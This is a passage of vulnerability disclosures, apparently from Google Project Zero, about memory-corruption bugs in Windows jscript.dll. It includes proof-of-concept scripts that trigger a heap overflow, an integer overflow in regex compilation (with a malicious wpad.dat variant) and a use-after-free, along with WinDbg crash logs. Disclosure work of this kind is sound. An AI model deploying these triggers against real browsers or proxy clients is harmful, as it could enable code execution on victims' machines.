jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
0:013> r
rax=0000000000000001 rbx=000007fef5d7bd50 rcx=00000000044acfa0
rdx=0000000000000000 rsi=0000000012b49fb8 rdi=0000000000000001
rip=000007fef5dea398 rsp=0000000012b49ae0 rbp=0000000000000000
r8=0000000004309f20 r9=0000000004309670 r10=0000000000000081
r11=0000000012b49a60 r12=0000000000000080 r13=0000000000000008
r14=00000000044d9f90 r15=0000000000000000
iopl=0 nv up ei ng nz ac po cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 00000000`12b49ae0 000007fe`f5dad069 jscript!NameTbl::GetValDef+0x58
01 00000000`12b49b70 000007fe`f5d7de69 jscript!NameTbl::InvokeInternal+0xb07
02 00000000`12b49c90 000007fe`f5d7bf3b jscript!VAR::GetValue+0xa1
03 00000000`12b49ce0 000007fe`f5ddb65d jscript!ConvertToString+0x5b
04 00000000`12b49f60 000007fe`f5d7c2ec jscript!JsArrayJoin+0x38d
05 00000000`12b4a060 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
06 00000000`12b4a110 000007fe`f5d786ea jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`12b4a230 000007fe`f5dcdd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
08 00000000`12b4a280 000007fe`f5d7c2ec jscript!JsFncCall+0xc2
09 00000000`12b4a310 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138
0a 00000000`12b4a3c0 000007fe`f5d7b234 jscript!NameTbl::InvokeInternal+0x3f8
0b 00000000`12b4a4e0 000007fe`f5d79852 jscript!VAR::InvokeByName+0x81c
0c 00000000`12b4a6f0 000007fe`f5d79929 jscript!VAR::InvokeDispName+0x72
0d 00000000`12b4a770 000007fe`f5d724b8 jscript!VAR::InvokeByDispID+0x1229
0e 00000000`12b4a7c0 000007fe`f5d78ec2 jscript!CScriptRuntime::Run+0x5a6
0f 00000000`12b4b5c0 000007fe`f5d78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
10 00000000`12b4b7d0 000007fe`f5d78b95 jscript!ScrFncObj::Call+0xb7
11 00000000`12b4b870 000007fe`f5d7e6c0 jscript!CSession::Execute+0x19e
12 00000000`12b4b940 000007fe`f5d870e7 jscript!COleScript::ExecutePendingScripts+0x17a
13 00000000`12b4ba10 000007fe`f5d868d6 jscript!COleScript::ParseScriptTextCore+0x267
14 00000000`12b4bb00 000007fe`ead55251 jscript!COleScript::ParseScriptText+0x56
15 00000000`12b4bb60 000007fe`eb4db320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
16 00000000`12b4bbe0 000007fe`ead56256 MSHTML!CScriptCollection::ParseScriptText+0x37f
17 00000000`12b4bcc0 000007fe`ead55c8e MSHTML!CScriptData::CommitCode+0x3d9
18 00000000`12b4be90 000007fe`ead55a11 MSHTML!CScriptData::Execute+0x283
19 00000000`12b4bf50 000007fe`eb5146fb MSHTML!CHtmScriptParseCtx::Execute+0x101
1a 00000000`12b4bf90 000007fe`eadf8a5b MSHTML!CHtmParseBase::Execute+0x235
1b 00000000`12b4c030 000007fe`eacd2e39 MSHTML!CHtmPost::Broadcast+0x90
1c 00000000`12b4c070 000007fe`ead2caef MSHTML!CHtmPost::Exec+0x4bb
1d 00000000`12b4c280 000007fe`ead2ca40 MSHTML!CHtmPost::Run+0x3f
1e 00000000`12b4c2b0 000007fe`ead2da12 MSHTML!PostManExecute+0x70
1f 00000000`12b4c330 000007fe`ead30843 MSHTML!PostManResume+0xa1
20 00000000`12b4c370 000007fe`ead16fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
21 00000000`12b4c3c0 000007fe`eb544f78 MSHTML!CDwnChan::OnMethodCall+0x41
22 00000000`12b4c3f0 000007fe`eac39d75 MSHTML!GlobalWndOnMethodCall+0x240
23 00000000`12b4c490 00000000`77709bbd MSHTML!GlobalWndProc+0x150
24 00000000`12b4c510 00000000`777098c2 USER32!UserCallWinProcCheckWow+0x1ad
25 00000000`12b4c5d0 000007fe`f2be4a87 USER32!DispatchMessageWorker+0x3b5
26 00000000`12b4c650 000007fe`f2bebabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
27 00000000`12b4f8d0 000007fe`fe88572f IEFRAME!LCIETab_ThreadProc+0x3a3
28 00000000`12b4fa00 000007fe`f5ff925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
29 00000000`12b4fa30 00000000`775e59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
2a 00000000`12b4fa80 00000000`7781a561 kernel32!BaseThreadInitThunk+0xd
2b 00000000`12b4fab0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
0:013> !heap -p -a 00000000`044d9f90
address 00000000044d9f90 found in
_DPH_HEAP_ROOT @ 3fd1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
3fe0680: 44d9000 2000
000007fef5f78726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
00000000778b4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
000000007785797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
000007feff2110c8 msvcrt!free+0x000000000000001c
000007fef5d7bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
000007fef5d7b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
000007fef5d942cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
000007fef5d719e2 jscript!GcContext::Reclaim+0x00000000000000ae
000007fef5d81956 jscript!GcContext::CollectCore+0x000000000000018b
000007fef5d817a5 jscript!GcContext::Collect+0x0000000000000025
000007fef5dc42f3 jscript!JsCollectGarbage+0x0000000000000023
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5d724b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007fef5d78ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
000007fef5d78d2b jscript!ScrFncObj::Call+0x00000000000000b7
000007fef5da2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5dea422 jscript!NameTbl::GetValDef+0x00000000000000e2
000007fef5dad069 jscript!NameTbl::InvokeInternal+0x0000000000000b07
000007fef5d7de69 jscript!VAR::GetValue+0x00000000000000a1
000007fef5d7bf3b jscript!ConvertToString+0x000000000000005b
000007fef5ddb65d jscript!JsArrayJoin+0x000000000000038d
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007fef5dcdd72 jscript!JsFncCall+0x00000000000000c2
000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138
000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007fef5d7b234 jscript!VAR::InvokeByName+0x000000000000081c
000007fef5d79852 jscript!VAR::InvokeDispName+0x0000000000000072
0:013> u rip
jscript!NameTbl::GetValDef+0x58:
000007fe`f5dea398 498b06 mov rax,qword ptr [r14]
000007fe`f5dea39b 488b98e0000000 mov rbx,qword ptr [rax+0E0h]
000007fe`f5dea3a2 488bcb mov rcx,rbx
000007fe`f5dea3a5 ff15b5320400 call qword ptr [jscript!_guard_check_icall_fptr (000007fe`f5e2d660)]
000007fe`f5dea3ab 488b54fc40 mov rdx,qword ptr [rsp+rdi*8+40h]
000007fe`f5dea3b0 4c8d442450 lea r8,[rsp+50h]
000007fe`f5dea3b5 498bce mov rcx,r14
000007fe`f5dea3b8 ffd3 call rbx
============================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1383
There is an heap overflow vulnerability in jscript.dll library (used in IE, WPAD and other places). The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.
PoC for IE (note: page heap might be required to obsorve the crash):
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var vars = new Array(100);
var arr = new Array(1000);
for(var i=1;i<600;i++) arr[i] = i;
var o = {toString:function() {
for(var i=600;i<1000;i++) {
arr[i] = 1337;
}
}}
function go() {
arr[0] = o;
Array.prototype.sort.call(arr);
}
go();
</script>
<!--
=========================================
Technical details:
Array.sort is implemented in JsArraySort which, depending if a comparison function was specified or not, calls JsArrayStringHeapSort or JsArrayFunctionHeapSort. These (vulnerable) functions take several arguments, 2 of which are the input array length and the number of elements currently in the input array (this can be smaller than the array length). The vulnerable functions are going to allcoate 2 buffers to store intermediate data. The size of these buffers will be calculated based on *num_elements*. However, while filling those arrays it is possible that the number of elements is going to increase, which causes a heap overflow.
Debug log:
=========================================
0:023> g
(e5c.988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!NameTbl::GetValCore+0x30:
000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????
0:013> r
rax=c0c0c0c0c0c00003 rbx=000000000443cf20 rcx=000000000441df90
rdx=0000000000000003 rsi=0000000004603010 rdi=000000000441df90
rip=000007fef4f59df0 rsp=00000000129a8e10 rbp=0000000000000000
r8=0000000004603010 r9=000000000441fdc8 r10=00000000040a9800
r11=00000000129a8e70 r12=0000000003ecb690 r13=0000000000000001
r14=0000000004603010 r15=0000000000000259
iopl=0 nv up ei ng nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
jscript!NameTbl::GetValCore+0x30:
000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 00000000`129a8e10 000007fe`f4f75f0e jscript!NameTbl::GetValCore+0x30
01 00000000`129a8e70 000007fe`f4f761d8 jscript!ArrayObj::GetValAtIndex+0x62
02 00000000`129a8eb0 000007fe`f4fbd5a2 jscript!ArrayObj::GetVal+0x28
03 00000000`129a8f40 000007fe`f4fbcd90 jscript!JsArrayStringHeapSort+0x1a6
04 00000000`129a90d0 000007fe`f4f5c2ec jscript!JsArraySort+0x270
05 00000000`129a9180 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
06 00000000`129a9230 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`129a9350 000007fe`f4fadd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
08 00000000`129a93a0 000007fe`f4f5c2ec jscript!JsFncCall+0xc2
09 00000000`129a9430 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
0a 00000000`129a94e0 000007fe`f4f5b234 jscript!NameTbl::InvokeInternal+0x3f8
0b 00000000`129a9600 000007fe`f4f59852 jscript!VAR::InvokeByName+0x81c
0c 00000000`129a9810 000007fe`f4f59929 jscript!VAR::InvokeDispName+0x72
0d 00000000`129a9890 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0x1229
0e 00000000`129a98e0 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
0f 00000000`129aa6e0 000007fe`f4f594b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
10 00000000`129aa8f0 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x2d3
11 00000000`129aaa10 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
12 00000000`129aaa60 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
13 00000000`129ab860 000007fe`f4f58d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
14 00000000`129aba70 000007fe`f4f58b95 jscript!ScrFncObj::Call+0xb7
15 00000000`129abb10 000007fe`f4f5e6c0 jscript!CSession::Execute+0x19e
16 00000000`129abbe0 000007fe`f4f670e7 jscript!COleScript::ExecutePendingScripts+0x17a
17 00000000`129abcb0 000007fe`f4f668d6 jscript!COleScript::ParseScriptTextCore+0x267
18 00000000`129abda0 000007fe`ec595251 jscript!COleScript::ParseScriptText+0x56
19 00000000`129abe00 000007fe`ecd1b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
1a 00000000`129abe80 000007fe`ec596256 MSHTML!CScriptCollection::ParseScriptText+0x37f
1b 00000000`129abf60 000007fe`ec595c8e MSHTML!CScriptData::CommitCode+0x3d9
1c 00000000`129ac130 000007fe`ec595a11 MSHTML!CScriptData::Execute+0x283
1d 00000000`129ac1f0 000007fe`ecd546fb MSHTML!CHtmScriptParseCtx::Execute+0x101
1e 00000000`129ac230 000007fe`ec638a5b MSHTML!CHtmParseBase::Execute+0x235
1f 00000000`129ac2d0 000007fe`ec512e39 MSHTML!CHtmPost::Broadcast+0x90
20 00000000`129ac310 000007fe`ec56caef MSHTML!CHtmPost::Exec+0x4bb
21 00000000`129ac520 000007fe`ec56ca40 MSHTML!CHtmPost::Run+0x3f
22 00000000`129ac550 000007fe`ec56da12 MSHTML!PostManExecute+0x70
23 00000000`129ac5d0 000007fe`ec570843 MSHTML!PostManResume+0xa1
24 00000000`129ac610 000007fe`ec556fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
25 00000000`129ac660 000007fe`ecd84f78 MSHTML!CDwnChan::OnMethodCall+0x41
26 00000000`129ac690 000007fe`ec479d75 MSHTML!GlobalWndOnMethodCall+0x240
27 00000000`129ac730 00000000`76d19bbd MSHTML!GlobalWndProc+0x150
28 00000000`129ac7b0 00000000`76d198c2 USER32!UserCallWinProcCheckWow+0x1ad
29 00000000`129ac870 000007fe`f11a4a87 USER32!DispatchMessageWorker+0x3b5
2a 00000000`129ac8f0 000007fe`f11ababb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
2b 00000000`129afb70 000007fe`fd48572f IEFRAME!LCIETab_ThreadProc+0x3a3
2c 00000000`129afca0 000007fe`f521925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
2d 00000000`129afcd0 00000000`76e159cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
2e 00000000`129afd20 00000000`76f4a561 kernel32!BaseThreadInitThunk+0xd
2f 00000000`129afd50 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1369
There is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors:
- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
- The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode.
The issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied.
PoC for Internet Explorer:
============================================
-->
<!-- saved from url=(0014)about:internet -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
</head>
<body>
<script language="Jscript.Encode">
var s = 'a';
for(var i=0;i<28;i++) {
s = s+s;
}
s = s+'[a-z]'+s;
r = new RegExp();
r.compile(s);
</script>
</body>
</html>
<!--
============================================
PoC for WPAD:
============================================
function FindProxyForURL(url, host) {
var s = 'a';
for(var i=0;i<28;i++) {
s = s+s;
}
s = s+'[a-z]'+s;
r = new RegExp();
r.compile(s);
return "DIRECT";
}
===========================================
Technical details:
The issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like:
void RegExpBase::EnsureSpace(int desired_size) {
if(desired_size > buffer_size) {
if(2 * desired_size < desired_size) {
//throw an exception
}
int new_size = 2 * desired_size;
char * new_buffer = realloc(buffer, new_size);
if(!new_buffer) {
//throw an exception
}
buffer = new_buffer;
buffer_size = new_size;
}
}
Note that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer.
Indeed, integer overflows can happen in the several callers of RegExpBase::EnsureSpace. The one being triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process.
Debug log (from IE, but it looks similar in the WPAD service):
============================================
(b90.698): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
msvcrt!memcpy+0x1d9:
000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????
0:012> r
rax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0
rdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a
rip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28
r8=0000000040000008 r9=0000000000000000 r10=6100610061006100
r11=000000021bb60fd8 r12=0000000016010fe8 r13=000007feebc91670
r14=0000000020000001 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
msvcrt!memcpy+0x1d9:
000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????
0:012> k
# Child-SP RetAddr Call Site
00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9
01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7
02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62
03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c
04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70
05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138
06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c
08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72
09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229
0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6
0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7
0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e
0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a
0f 00000000`1239b840 000007fe`ebc868d6 jscript!COleScript::ParseScriptTextCore+0x267
10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56
11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9
14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283
15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235
17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90
18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb
19 00000000`1239c0b0 000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f
1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70
1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1
1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41
1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240
1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150
20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad
21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5
22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3
24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
26 00000000`1239f8b0 00000000`7745a561 kernel32!BaseThreadInitThunk+0xd
27 00000000`1239f8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
============================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1381
There is a use-after-free in jscript.dll library that can be exploited in IE11.
PoC:
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var o1 = {toJSON:function(){
alert('o1');
return [o2];
}}
var o2 = {toJSON:function(){
alert('o2');
CollectGarbage();
return 'x';
}}
JSON.stringify(o1);
</script>
<!--
=========================================
Technical details:
JSONStringifyObject first calls JSONApplyFilters which calls an argument's toString method. However the return value of the toString method won't be on the garbage collector's root object list and thus can be freed during subsequent callbacks.
Debug log:
=========================================
0:028> g
(df8.e48): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!JSONStringifyArray+0x38f:
000007fe`edbf9fb3 66214738 and word ptr [rdi+38h],ax ds:00000000`04518fc8=????
0:014> r
rax=000000000000fffb rbx=0000000000000000 rcx=0000000000000005
rdx=0000000000000005 rsi=00000000129ca100 rdi=0000000004518f90
rip=000007feedbf9fb3 rsp=00000000129c9f30 rbp=00000000129c9fa9
r8=0000000000000000 r9=000000000405d670 r10=0000000000000081
r11=00000000129c9f00 r12=0000000000000001 r13=0000000000000001
r14=0000000000000000 r15=00000000129ca1a8
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
jscript!JSONStringifyArray+0x38f:
000007fe`edbf9fb3 66214738 and word ptr [rdi+38h],ax ds:00000000`04518fc8=????
0:014> k
# Child-SP RetAddr Call Site
00 00000000`129c9f30 000007fe`edbfa2cc jscript!JSONStringifyArray+0x38f
01 00000000`129ca000 000007fe`edbfec94 jscript!JSONStringifyObject+0x2dc
02 00000000`129ca0b0 000007fe`edb9c2ec jscript!JsJSONStringify+0x3e4
03 00000000`129ca190 000007fe`edb9a9fe jscript!NatFncObj::Call+0x138
04 00000000`129ca240 000007fe`edb9b234 jscript!NameTbl::InvokeInternal+0x3f8
05 00000000`129ca360 000007fe`edb99852 jscript!VAR::InvokeByName+0x81c
06 00000000`129ca570 000007fe`edb99929 jscript!VAR::InvokeDispName+0x72
07 00000000`129ca5f0 000007fe`edb924b8 jscript!VAR::InvokeByDispID+0x1229
08 00000000`129ca640 000007fe`edb98ec2 jscript!CScriptRuntime::Run+0x5a6
09 00000000`129cb440 000007fe`edb98d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
0a 00000000`129cb650 000007fe`edb98b95 jscript!ScrFncObj::Call+0xb7
0b 00000000`129cb6f0 000007fe`edb9e6c0 jscript!CSession::Execute+0x19e
0c 00000000`129cb7c0 000007fe`edba70e7 jscript!COleScript::ExecutePendingScripts+0x17a
0d 00000000`129cb890 000007fe`edba68d6 jscript!COleScript::ParseScriptTextCore+0x267
0e 00000000`129cb980 000007fe`ee2f5251 jscript!COleScript::ParseScriptText+0x56
0f 00000000`129cb9e0 000007fe`eea7b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
10 00000000`129cba60 000007fe`ee2f6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
11 00000000`129cbb40 000007fe`ee2f5c8e MSHTML!CScriptData::CommitCode+0x3d9
12 00000000`129cbd10 000007fe`ee2f5a11 MSHTML!CScriptData::Execute+0x283
13 00000000`129cbdd0 000007fe`eeab46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
14 00000000`129cbe10 000007fe`ee398a5b MSHTML!CHtmParseBase::Execute+0x235
15 00000000`129cbeb0 000007fe`ee272e39 MSHTML!CHtmPost::Broadcast+0x90
16 00000000`129cbef0 000007fe`ee2ccaef MSHTML!CHtmPost::Exec+0x4bb
17 00000000`129cc100 000007fe`ee2cca40 MSHTML!CHtmPost::Run+0x3f
18 00000000`129cc130 000007fe`ee2cda12 MSHTML!PostManExecute+0x70
19 00000000`129cc1b0 000007fe`ee2d0843 MSHTML!PostManResume+0xa1
1a 00000000`129cc1f0 000007fe`ee2b6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1b 00000000`129cc240 000007fe`eeae4f78 MSHTML!CDwnChan::OnMethodCall+0x41
1c 00000000`129cc270 000007fe`ee1d9d75 MSHTML!GlobalWndOnMethodCall+0x240
1d 00000000`129cc310 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1e 00000000`129cc390 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1f 00000000`129cc450 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
20 00000000`129cc4d0 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
21 00000000`129cf750 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
22 00000000`129cf880 000007fe`efb2925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
23 00000000`129cf8b0 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
24 00000000`129cf900 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
25 00000000`129cf930 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
0:014> !heap -p -a 00000000`04518fc8
address 0000000004518fc8 found in
_DPH_HEAP_ROOT @ 3d31000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
3d49750: 4518000 2000
000007feefb88726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
00000000774c4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
000000007746797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
000007fefd4b10c8 msvcrt!free+0x000000000000001c
000007feedb9bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
000007feedb9b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
000007feedbb42cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
000007feedb919e2 jscript!GcContext::Reclaim+0x00000000000000ae
000007feedba1956 jscript!GcContext::CollectCore+0x000000000000018b
000007feedba17a5 jscript!GcContext::Collect+0x0000000000000025
000007feedbe42f3 jscript!JsCollectGarbage+0x0000000000000023
000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
000007feedb9c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
000007feedb98d2b jscript!ScrFncObj::Call+0x00000000000000b7
000007feedbc2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007feedbf8ee3 jscript!GCProtectKeyAndCall+0x000000000000009f
000007feedbf97a6 jscript!JSONApplyFilters+0x000000000000014a
000007feedbfa08b jscript!JSONStringifyObject+0x000000000000009b
000007feedbf9e77 jscript!JSONStringifyArray+0x0000000000000253
000007feedbfa2cc jscript!JSONStringifyObject+0x00000000000002dc
000007feedbfec94 jscript!JsJSONStringify+0x00000000000003e4
000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
000007feedb9a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007feedb9b234 jscript!VAR::InvokeByName+0x000000000000081c
000007feedb99852 jscript!VAR::InvokeDispName+0x0000000000000072
000007feedb99929 jscript!VAR::InvokeByDispID+0x0000000000001229
000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
=========================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1378
There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- By opening a malicious web page in Internet Explorer.
- [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.
The issue has been verified on 64-bit Windows 10 with the most recent patches applied.
PoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. Might no work very reliably due to the nature of the issue, please see the technical details below):
============================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
